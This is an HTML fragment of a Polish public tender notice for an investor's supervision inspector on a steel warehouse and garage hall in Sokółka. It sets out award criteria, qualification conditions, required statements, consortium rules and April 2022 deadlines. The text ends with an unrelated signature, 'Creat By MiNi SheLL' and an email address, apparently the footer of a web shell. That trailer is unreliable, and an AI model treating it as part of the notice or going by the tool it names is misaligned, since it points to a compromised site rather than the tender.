oraz<br/>uzyska najwyższą sumę punktów w kryterium „Cena” i „Doświadczenie zawodowe osoby wskazanej do pełnienia funkcji Inspektora<br/>nadzoru inwestorskiego w specjalności konstrukcyjno – budowlanej”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osoby wskazanej do pełnienia funkcji Inspektora nadzoru inwestorskiego w specjalności konstrukcyjno - budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający odstępuje od stawiania warunków szczególnych w tym zakresie.<br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający odstępuje od stawiania warunków szczególnych w tym zakresie.<br/>3. Sytuacja ekonomiczna lub finansowa<br/>Zamawiający odstępuje od stawiania warunków szczególnych w tym zakresie.<br/>4. Zdolność techniczna lub zawodowa<br/>W celu potwierdzenia przez Wykonawcę spełniania warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej, Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny lub zawodowy):<br/>1) wskazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, zrealizował i zakończył (a w przypadku realizacji zamówień powtarzających się lub ciągłych wykonał, zrealizował i zakończył części zamówień), jako Wykonawca lub Podwykonawca, co najmniej:<br/>1 zadanie polegające na usłudze w zakresie pełnienia nadzoru nad realizacją budowy, rozbudowy, odbudowy lub przebudowy budynku o konstrukcji stalowej o wartości brutto tego budynku nie mniejszej niż 927 000,00PLN (słownie: dziewięćset dwadzieścia siedem tysięcy, 00/100PLN)<br/>lub<br/>2 zadań polegające na usłudze w zakresie pełnienia nadzorów nad realizacją budowy, rozbudowy, odbudowy lub przebudowy budynku o konstrukcji stalowej o łącznej wartości brutto tego budynku nie mniejszej niż 927 000,00PLN (słownie: dziewięćset dwadzieścia siedem tysięcy, 00/100PLN).<br/>[Za usługę polegającą na pełnieniu nadzoru nad realizacją zadania Zamawiający uzna:<br/>− usługę polegającą na zarządzaniu, pełnieniu kontroli i nadzoru inwestorskiego oraz współpracy ze służbami Zamawiającego w zakresie sprawozdawczości;<br/>− sprawowanie usługi nadzoru z całym okresie realizacji zadania, tj. od dnia przekazania placu budowy albo rozpoczęcia budowy do dnia wystawienia Świadectwa Przejęcia/Protokołu odbioru robót].<br/>2) dysponować w trakcie realizacji zadania osobą wyznaczoną do pełnienia funkcji Inspektora nadzoru inwestorskiego posiadającą:<br/>a) uprawnienia budowlane w specjalności konstrukcyjno – budowlanej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane w zakresie niezbędnym do wykonywania przedmiotu zamówienia – wymagane przepisami prawa;<br/>b) doświadczenie w specjalności konstrukcyjno – budowlanej na stanowisku Inspektora nadzoru inwestorskiego lub Kierownika budowy lub Kierownika robót, rozumiane jako pełnienie funkcji Inspektora nadzoru inwestorskiego lub Kierownika budowy lub Kierownika robót przy wykonaniu, zrealizowaniu i zakończeniu (a w przypadku realizacji zamówień powtarzających się lub ciągłych wykonaniu, zrealizowaniu i zakończeniu części zamówień) co najmniej:<br/>1 zadania w specjalności konstrukcyjno – budowlanej polegającego na pełnieniu obowiązków Inspektora nadzoru inwestorskiego lub Kierownika budowy lub Kierownika robót przy budowie, rozbudowie, odbudowie lub przebudowie budynku o konstrukcji stalowej o wartości brutto tego budynku nie mniejszej niż 927 000,00PLN (słownie: dziewięćset dwadzieścia siedem tysięcy, 00/100PLN)<br/>lub<br/>2 zadań w specjalności konstrukcyjno – budowlanej polegającego na pełnieniu obowiązków Inspektora nadzoru inwestorskiego lub Kierownika budowy lub Kierownika robót przy budowie, rozbudowie, odbudowie lub przebudowie budynku o konstrukcji stalowej o łącznej wartości brutto tego budynku nie mniejszej niż 927 000,00PLN (słownie: dziewięćset dwadzieścia siedem tysięcy, 00/100PLN).<br/>[Przez wykonanie, zrealizowanie i zakończenie zadania w specjalności konstrukcyjno – budowlanej polegającego na pełnieniu obowiązków Inspektora nadzoru inwestorskiego lub Kierownika budowy lub Kierownika robót przy budowie, rozbudowie, odbudowie lub przebudowie rozumie się wykonanie, zrealizowanie i zakończenie zadania usługi nadzoru w pełnym okresie realizacji zadania, tj.: od dnia przekazania placu budowy albo rozpoczęcia budowy do dnia wystawienia Świadectwa Przejęcia/Protokołu odbioru robót].<br/>UWAGA: Osoba, która będzie sprawowała nadzór inwestorski nie może być powiązana z Wykonawcą zadania pn. „Budowa hali magazynowo – garażowej na potrzeby Obwodu Drogowo – Mostowego Nr 1 w Sokółce”. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia<br/>braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, Zamawiający zamiast podmiotowych środków dowodowych<br/>(określonych Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. poz. 2415)), żąda<br/>oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy złożonym<br/>wraz z ofertą, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w Instrukcji dla Wykonawców w<br/>pkt 6.1. ppkt 1) – 6) [tj. zawartych w treści art. 108 ust. 1 pkt 1) – 6) Ustawy z dnia 11 września 2019r. - Prawo zamówień publicznych<br/>(tj. Dz.U. z 2021r. poz. 1129 z późn. zm.)].<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 1, składa każdy z<br/>wykonawców.<br/>3. Wykonawca mający siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, w celu potwierdzenia braku<br/>podstaw wykluczenia Wykonawcy z udziału w postępowaniu składa oświadczenie, o którym mowa w pkt 1.<br/>4. Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 Ustawy, przedstawienia oświadczenia o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy dotyczących tych podmiotów,<br/>potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w Instrukcji dla Wykonawców w pkt 6.1. ppkt 1) – 4) i 6) [tj. zawartych w treści art. 108 ust. 1 pkt 1) – 4) i 6) Ustawy z dnia 11 września 2019r. - Prawo zamówień publicznych (tj. Dz.U. z 2021r. poz. 1129 z późn. zm.)]</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Zdolność do występowania w obrocie gospodarczym<br/>Nie dotyczy.<br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Nie dotyczy.<br/>3. Sytuacja ekonomiczna lub finansowa<br/>Nie dotyczy.<br/>4. Zdolność techniczna lub zawodowa<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda następujących podmiotowych środków dowodowych.<br/>1) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/>[w przypadku powoływania się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami niniejszy wykaz dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy]. (Załącznik nr 8);<br/>2) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 9);<br/>5. Okresy wyrażone w latach lub miesiącach, o których mowa w pkt 4. ppkt 1), liczy się wstecz od dnia:<br/>1) w którym upływa termin składania ofert w postępowaniu;<br/>2) złożenia podmiotowego środka dowodowego, o którym mowa w pkt 4. ppkt 1) w przypadkach, o których mowa w art. 217 ust. 2, art. 455 ust. 1 pkt 2 lit. b oraz art. 462 ust. 7 Ustawy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą powinny być złożone odpowiednio:<br/>1. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, 125 ust 1<br/>Ustawy. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w w<br/>zdaniu pierwszym, składa każdy z wykonawców. Oświadczenie te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu;<br/>2. Odpis z Krajowego Rejestru Sądowego lub informacja z Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, w odniesieniu do Wykonawcy, Wykonawcy wspólnie ubiegającego się o zamówienie (jeżeli<br/>dotyczy), jak również w odniesieniu do podmiotów udostępniających zasoby (jeżeli dotyczy) chyba ze Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do<br/>tych dokumentów. W przypadku wskazania przez Wykonawcę dostępności ww. dokumentów, pod określonymi adresami<br/>internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy przedstawienia<br/>tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego dokumentów.<br/>3. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu<br/>udostępniającego zasoby, chyba że umocowanie do reprezentacji wynika z dokumentów, o których mowa w ppkt 2;<br/>4. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do<br/>reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>5. Zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy) do oddania Wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów wraz z pełnomocnictwami, jeżeli prawo<br/>do podpisania danego zobowiązania nie wynika z dokumentów, o których mowa w ppkt 2;<br/>6. Oświadczenie podmiotu udostępniającego zasoby (jeżeli dotyczy), potwierdzające brak podstaw wykluczenia tego<br/>podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na<br/>jego zasoby;<br/>7. Oświadczenie (jeżeli dotyczy) wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia o spełnianiu warunków<br/>udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania, składa każdy z wykonawców. Oświadczenia<br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>4. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający żąda<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>5. Stosownie do treści art. 117 ust. 2 Ustawy warunek dotyczący uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 Ustawy , jest spełniony, jeżeli co najmniej jeden z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te<br/>uprawnienia są wymagane.<br/>6. Stosownie do treści art. 117 ust. 3 Ustawy w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>7. Stosownie do treści art. 117 ust. 4 Ustawy w przypadku, o którym mowa w ust. 2 i 3, Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>8. Wykonawców prowadzących działalność w formie spółki cywilnej należy traktować jak Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 Ustawy,<br/>odnosić należy również do tych Wykonawców. W konsekwencji Wykonawcy ci, w okolicznościach o których mowa w art.<br/>117 ust. 2 i 3 Ustawy, zobowiązani są dołączyć do oferty oświadczenie, o którym mowa w art. 117 ust. 4 Ustawy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umów oraz warunki ich wprowadzenia dla przedmiotowego postępowania zawarto w Specyfikacji<br/>Warunków Zamówienia w Rozdziale II. Projektowane postanowienia umowy w sprawie zamówienia publicznego, § 13.<br/>Dopuszczalne zmiany postanowień umowy - ograniczenia techniczne ogłoszenia w ilości znaków <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-26 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-26 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> część dalsza z sekcja III pkt. 3.6)11. System dostępny jest za pośrednictwem następujących przeglądarek internetowych:1)<br/>Microsoft Internet Explorerod wersji 11.0, 2) Mozilla Firefox od wersji 15, 3) Google Chrome od wersji 20<br/>4) Microsoft Edge. 12. Zamawiający dopuszcza przesyłanie danych w formatach dopuszczonych<br/>odpowiednimi przepisami prawa, tj. m.in.: .doc, .docx, .xls, .xlsx, .pdf, .zip, przy czym<br/>Zamawiający określając dopuszczalne formaty danych korzysta z katalogu formatów<br/>wskazanych w załączniku nr 2, z uwzględnieniem charakteru postpowania i żądanych informacji,<br/>do Rozporządzenia Rady<br/>Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>Zamawiający dopuszcza również inne formaty wskazane w Rozporządzeniu. Zamawiający zaleca wykorzystywanie plików<br/>w<br/>formacie .pdf. W przypadku zastosowania innego formatu niż te, o których mowa w zdaniu<br/>pierwszym Zamawiający może nie mieć możliwości zapoznania się z ofertą, co może<br/>spowodować jej odrzucenie.<br/>13.1. Wykonawca składa ofertę w postępowaniu za pośrednictwem „Formularza do złożenia,<br/>zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na<br/>miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla<br/>wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu oferty<br/>Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie<br/>korespondencja związana z postępowaniem. 13.2. Ofertę należy sporządzić w języku polskim.<br/>13.3. Ofertę w postępowaniu składa się, pod rygorem nieważności, w formie elektronicznej (tj.<br/>postać elektroniczna opatrzona kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 13.4. Sposób złożenia<br/>oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na<br/>stronie: https://miniportal.uzp.gov.pl/. 13.5. Jeżeli dokumenty elektroniczne, przekazywane przy<br/>użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę<br/>przedsiębiorstwa w rozumieniu<br/>przepisów Ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z<br/>2020 r. poz. 1913), Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem polecenia<br/>„Załącznik stanowiący tajemnicę przedsiębiorstwa”, a następnie wraz z plikami stanowiącymi<br/>jawną część należy ten plik zaszyfrować.<br/>13.6. Do oferty należy dołączyć oświadczenie (oświadczenia – jeżeli dotyczy) o niepodleganiu<br/>wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym we wzorze<br/>dołączonym jako załącznik do SWZ – Instrukcji dla Wykonawców, w formie elektronicznej (tj.<br/>postać elektroniczna opatrzona kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a następnie<br/>zaszyfrować wraz z plikami stanowiącymi ofertę. 13.7. Oferta może być złożona tylko do upływu<br/>terminu składania ofert. 13.8. Wykonawca może przed upływem terminu do składania ofert<br/>wycofać ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób wycofania<br/>oferty został opisany w „Instrukcji użytkownika” dostępnej na miniPortalu. 13.9. Wykonawca po<br/>upływie terminu do składania ofert nie może skutecznie dokonać zmiany<br/>ani wycofać złożonej oferty.<br/>Informacje o środkach komunikacji elektronicznej oraz informacje o wymaganiach technicznych i<br/>organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej<br/>szczegółowo opisane są w pkt 9 SWZ – Instrukcji dla Wykonawców

Creat By MiNi SheLL
Email: jattceo@gmail.com